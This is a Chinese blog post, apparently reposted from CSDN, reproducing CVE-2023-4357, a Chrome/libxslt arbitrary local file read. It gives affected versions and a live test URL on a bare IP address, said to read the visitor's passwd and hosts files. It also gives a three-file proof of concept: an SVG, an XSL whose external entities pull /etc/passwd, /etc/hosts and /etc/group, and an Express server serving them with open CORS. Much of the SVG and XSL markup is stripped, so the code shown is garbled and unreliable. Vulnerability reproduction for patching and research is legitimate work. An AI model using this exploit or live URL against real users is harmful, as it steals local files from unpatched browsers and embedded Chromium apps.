码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现


    Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现

    1.漏洞描述

    该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页,诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。Libxslt 是在基于 WebKit 的浏览器(如 chrome,safari 等)中默认使用的 XSL 库。Libxslt 允许 XSL document() 方法加载的文档内部存在外部实体。攻击者可以绕过安全限制,从 http(s):// 网址访问 file:// 网址并获取文件访问权限

    影响版本

    Google Chrome < 116.0.5845.96

    依赖Chromium内核的组件,如vscode、微信等。

    2.漏洞复现

    开发者提供了一个示例 POC,测试通过微信、抖音之类的 app 直接访问下面的 url 即可触发读取本机的 passwd 文件和 hosts 文件

    该测试 URL:http://188.68.220.248/js.svg

    参考链接:https://bugs.chromium.org/p/chromium/issues/detail?id=1458911

    在这里插入图片描述

    通过了解POC需要配置三个文件

    1.test.svg文件内容

    
    
    
    
    
     
    	
    		
    		    
    #Copy me#
    XSL:
    Vendor:
    Vendor URL:
    document()
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20

    2.test.xsl文件内容

    
    
    
    
    ]> 
    
    

    /etc/passwd: &passwd;

    /etc/hosts: &hosts;

    /etc/group: &group;

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19

    3.server.js文件内容

    const express = require('express');
    const path = require('path');
    
    const app = express();
    const port = 3000;
    
    app.get('/test.svg', (req, res) => {
      res.sendFile(path.join(__dirname, 'test.svg'));
    });
    
    app.get('/test.xsl', (req, res) => {
      res.set('Access-Control-Allow-Origin', '*');
      res.sendFile(path.join(__dirname, 'test.xsl'));
    });
    
    app.listen(port, () => {
      console.log(`Example app listening on port ${port}`);
    });
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    将这三个文件放到服务器上,手机微信点击访问:

    http://xxx.xxx.xxx.xxx/test.svg

    在这里插入图片描述

    可以看到复现成功,成功读取本地文件。

  • 相关阅读:
    1766. 互质树 DFS+桶
    Spring Boot获取节假日API
    关于去除图片上的水印
    【Python Web】Flask框架(三)CSS案例应用及样式模板的使用
    四川迎来降温降雨,如何提高该地区城市的内涝应对能力?
    LeetCode:2385. 感染二叉树需要的总时间(DFS Java)
    SSL协议
    Docker安装启动Mysql
    JAVA 泛型的定义以及使用
    2022年第三季度泛出行行业洞察:泛出行行业正在经历数智化升级的关键时期,用户规模保持平稳增长,行业整体良性发展
  • 原文地址:https://blog.csdn.net/huangyongkang666/article/details/134477830
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号